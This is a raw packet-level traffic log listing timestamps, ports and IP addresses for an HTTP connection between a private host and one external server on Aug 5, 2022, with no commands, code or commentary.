Aug 5, 2022 13:54:13.411382914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411389112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411406994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411425114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411425114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411444902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411453009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411463976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411483049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411484003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411501884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411511898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411523104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411540985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411542892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411560059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411569118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411577940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411597013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411613941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411614895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411636114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411640882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411654949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411662102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411674976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411690950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411694050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411714077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411720037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411734104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411752939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411753893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411772013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411775112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411791086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411802053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411808968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411819935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411828995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411839962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411848068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411859035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411865950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411880016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411886930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411900997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411906004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411920071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411926031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411942005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411945105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411961079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411963940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411982059 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.411983967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.411998034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.412003994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.412023067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.412024021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.412041903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.412060976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.472824097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.472929001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502480984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502504110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502523899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502542973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502561092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502578974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502597094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502615929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502628088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502634048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502654076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502674103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502692938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502711058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502728939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502727985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502748013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502764940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502768993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502785921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502796888 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502804041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502824068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502840996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502856970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502875090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502873898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502892971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502899885 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502907038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502912998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502921104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502932072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502950907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502949953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.502970934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502988100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.502990961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503005981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503024101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503031969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503045082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503046989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503063917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503077984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503082037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503101110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503113031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503118038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503137112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503150940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503154039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503173113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503176928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503190994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503206968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503243923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503246069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503264904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503283024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503300905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503319025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503336906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503345013 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503372908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503380060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503410101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503428936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503448009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503457069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503468037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503480911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503494978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503499031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503504038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503514051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503528118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503550053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503567934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503582001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503588915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503622055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503632069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503639936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503654957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503669977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503680944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503683090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503701925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503720999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503726006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503740072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503757000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503776073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503777027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503793955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503799915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503813028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503820896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503832102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503850937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503851891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503869057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503887892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503905058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503911018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503916979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503925085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503943920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503961086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503979921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.503993034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.503998041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504025936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504033089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504045963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504049063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504062891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504064083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504066944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504070044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504072905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504085064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504103899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504106045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504121065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504136086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504139900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504158020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.504306078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.504316092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533418894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533447027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533469915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533489943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533514023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533538103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533560038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533581018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533577919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533603907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533608913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533616066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533628941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533651114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533673048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533694029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533704996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533716917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533742905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533744097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533754110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533776999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533799887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533808947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533818960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533822060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533824921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533829927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533833981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533837080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533847094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533870935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533870935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533894062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533921003 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533931017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533951998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533956051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533976078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.533982992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533991098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.533998966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534019947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534043074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534061909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534073114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534082890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534105062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534125090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534132957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534146070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534162045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534167051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534189939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534212112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534233093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534255028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534276962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534298897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534305096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534321070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534342051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534353971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534363985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534385920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534408092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534420967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534430027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534451962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534471989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534481049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534492970 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534498930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534502029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534508944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534516096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534521103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534523964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534533978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534542084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534545898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534553051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534560919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534568071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534569025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534591913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534612894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534635067 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534655094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534728050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534742117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534764051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534771919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534806967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534826994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534847021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534867048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534873962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534888983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534919977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534926891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534929991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534940004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534946918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534950018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534955978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534964085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534970999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534976959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.534979105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534986973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.534996033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535000086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535022974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535042048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535063028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535084009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535104036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535124063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535145044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535165071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535185099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535204887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535224915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535233974 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535245895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535267115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535248041 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535288095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535307884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535310984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535319090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535324097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535330057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535351038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535371065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.535388947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.535396099 CEST	49778	80	192.168.2.4	51.195.166.178
